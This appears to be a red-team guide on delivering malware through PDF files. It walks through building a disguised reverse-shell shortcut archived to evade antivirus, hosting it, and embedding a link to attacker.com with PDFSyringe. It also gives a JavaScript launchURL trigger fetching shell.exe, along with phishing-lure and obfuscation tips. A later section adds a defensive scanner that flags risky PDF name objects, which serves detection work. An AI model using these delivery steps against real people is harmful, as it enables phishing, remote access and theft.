Type: Malicious Documents & File-Based Delivery
Platform: Windows, macOS, Linux (PDF Reader or browser-dependent)
Prerequisites: User must open the PDF file in a vulnerable or misconfigured PDF reader (e.g., Adobe Reader with JavaScript enabled) for code execution
Malicious PDF files are widely used in phishing campaigns and red team operations for initial access. PDFs can embed JavaScript, launch actions, file attachments, and even execute external programs in some cases.
Attackers exploit JavaScript execution, action triggers, and vulnerabilities in PDF viewers (e.g., Adobe Reader CVE-2010-1240, CVE-2018-4990, CVE-2023-26369, CVE-2024-41869) to:
- Drop/execute malware
- Execute commands (via vulnerable Adobe Acrobat Reader: CVE-2010-1240, CVE-2018-4990, CVE-2023-26369, CVE-2024-41869)
- Harvest credentials (via JavaScript/forms)
Attack Flow
- The attacker creates a malicious PDF file.
- The PDF includes either:
  - JavaScript code (to drop malware or phish for credentials), or
  - an exploit trigger (e.g., Adobe Acrobat: CVE-2010-1240, CVE-2018-4990, CVE-2023-26369, CVE-2024-41869)
- When the user opens the file, the embedded code is executed automatically or after user interaction, depending on the PDF reader's configuration.
Some PDF exploits do not require user interaction and trigger on open.
Tools Needed
- msfvenom or another payload generator (optional)
- A PDF editor or a tool to generate a malicious PDF file, e.g. PDFSyringe or EvilPDF
- msfconsole or nc (for listening)
In most cases PDFs are used to drop malware or harvest credentials (with social engineering), so I'll demonstrate how to leverage a PDF to drop malware on the target system (and convince the victim to open the dropped malware).
Steps
- Create Payload (Reverse Shell)
We'll create a shortcut (.lnk) that executes our reverse shell and make it look like a benign document, then compress it into a .7z archive (to evade AV and the Windows Mark of the Web).
At the end we will have a 7-Zip archive that contains our shortcut file and a PDF file to display to the victim (to avoid raising suspicion).
- Host the payload
Use Python to host the payload (zip archive):
    python -m http.server 80
- Embed a URI to the remote payload
Use PDFSyringe to make a PDF file that has a clickable link to the payload:
    git clone https://github.com/o-sec/PDFSyringe
    cd PDFSyringe
    chmod +x pdfsyringe.py
    ./pdfsyringe.py -u http://attacker.com/payload.7z -t template.pdf -o document1.pdf
This generates a malicious PDF file with the embedded clickable URI to the payload.
- Deliver the PDF
- Send via email attachment with a social engineering lure
- Host on a web server (e.g., http://attacker.com/invoice.pdf)
- Execution
When the victim opens the PDF file, they will potentially fall for the social engineering lure, download the 7-Zip archive, extract it and (hopefully) open the stage-2 payload; then we get a reverse shell :)
At the end of the day it depends on social engineering, but in some cases we could exploit vulnerabilities in PDF readers such as CVE-2010-1240, CVE-2018-4990, CVE-2023-26369, CVE-2024-41869.
JavaScript Trigger Inside PDF
    app.launchURL("http://attacker.com/shell.exe", true);
Alert with JavaScript
    app.alert("hello !");
Tips
- Rename the PDF to something enticing: Invoice_351.pdf
- Use a password-protected ZIP to deliver the PDF if AV blocks it
- PDF readers vary in behavior; test on Adobe Reader and browser PDF viewers
- Use obfuscated JavaScript for stealth
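From the defender's side, the triggers described above (JavaScript actions, OpenAction/AA auto-run hooks, URI and Launch actions, embedded files) are all visible as PDF name objects in the file's raw bytes, which is how pdfid-style triage works. The script below is an added example written for this page; it is not code from the page, from PDFSyringe or from EvilPDF. It counts those names, decodes the PDF `#xx` name escape (so `/J#53` is still recognised as `/JS`, a trick the "obfuscated JavaScript" tip alludes to), and derives a coarse verdict. SUSPICIOUS_NAMES, scan_pdf_bytes, the three sample documents and the example.invalid host are all constructed for the example; the sample PDFs are deliberately minimal and not valid complete files.

```python
"""PDF triage scanner (added example): count risky name objects in raw PDF bytes.

Constructed for illustration; the name objects themselves (/JS, /OpenAction, ...)
are the standard PDF names a defender looks for.
"""
import re
from collections import Counter

# Name objects worth flagging, with why a defender cares (assumed list, not exhaustive).
SUSPICIOUS_NAMES = {
    "/JS": "inline JavaScript string or stream",
    "/JavaScript": "JavaScript action",
    "/OpenAction": "action run when the document is opened",
    "/AA": "additional actions (page open, form events)",
    "/Launch": "launch action (runs an external program)",
    "/URI": "URI action (clickable link, e.g. to a remote payload)",
    "/EmbeddedFile": "embedded file attachment",
    "/SubmitForm": "form submission (possible credential harvesting)",
    "/ObjStm": "object stream (compressed objects; names inside are invisible to a raw scan)",
}

AUTO_TRIGGERS = {"/OpenAction", "/AA"}          # fire without a click
CODE_ACTIONS = {"/JS", "/JavaScript", "/Launch"}  # execute something

# A PDF name runs from '/' to the next whitespace or delimiter character.
NAME_TOKEN = re.compile(rb"/[^\s/\[\]<>(){}%]*")
# '#xx' inside a name encodes one byte; /J#53 is the same name as /JS.
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_name(token: bytes) -> str:
    """Decode PDF name hex escapes so obfuscated names compare equal to plain ones."""
    decoded = HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), token)
    return decoded.decode("latin-1")


def scan_pdf_bytes(data: bytes) -> dict:
    """Count suspicious name objects in raw PDF bytes and derive a triage verdict."""
    counts = Counter()
    obfuscated = 0
    for match in NAME_TOKEN.finditer(data):
        token = match.group(0)
        name = normalize_name(token)
        if name in SUSPICIOUS_NAMES:
            counts[name] += 1
            if b"#" in token:          # a flagged name that needed escaping is itself a signal
                obfuscated += 1
    found = set(counts)
    # Auto-run trigger paired with executable content: the "opens and fires" case.
    auto_exec = bool(found & AUTO_TRIGGERS) and bool(found & CODE_ACTIONS)
    if auto_exec or obfuscated:
        verdict = "high"
    elif found & (CODE_ACTIONS | {"/URI", "/EmbeddedFile", "/SubmitForm"}):
        verdict = "medium"             # e.g. the clickable-link lure from the steps above
    else:
        verdict = "low"
    return {
        "indicators": {n: counts[n] for n in sorted(counts)},
        "obfuscated_names": obfuscated,
        "auto_exec": auto_exec,
        "verdict": verdict,
    }


def scan_pdf_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return scan_pdf_bytes(fh.read())


# Constructed sample documents (minimal fragments, not valid complete PDFs, not real malware).
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# A link annotation pointing at a remote archive: the lure built in the steps above.
LINK_LURE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [72 700 300 720]
/A << /S /URI /URI (http://example.invalid/payload.7z) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# JavaScript wired to /OpenAction, with the /JS key hex-escaped as /J#53.
AUTO_JS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
5 0 obj << /S /JavaScript /J#53 (app.alert("hello !");) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("link lure", LINK_LURE_PDF), ("auto-run JS", AUTO_JS_PDF)):
        print(label, scan_pdf_bytes(doc))
```

Two caveats a practitioner should keep in mind: a raw byte scan only sees names that are stored uncompressed, so a `/ObjStm` hit means the interesting dictionaries may be inside a FlateDecode stream and need a parser that inflates object streams (pdf-parser and similar tools do this); and a `/URI` hit is exactly what a legitimate document with hyperlinks also produces, which is why the link-lure case is rated medium rather than high and still needs a human to look at where the link points.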
References
- PDFSyringe
- CVE-2010-1297
- EvilPDF GitHub
- Threat-Loaded: Malicious PDFs Never Go Out of Style
- CVE-2010-1240: Adobe Reader and Acrobat arbitrary code execution
- PDF Malware Is Not Yet Dead
- CVE-2023-26369: Adobe Acrobat PDF Reader RCE when processing TTF fonts
- Beware of weaponized PDF
- Rise in Deceptive PDF: The Gateway to Malicious Payloads
- Can a PDF File be Malware? (John Hammond, YouTube)
- The Weaponization of PDFs
Author: o-sec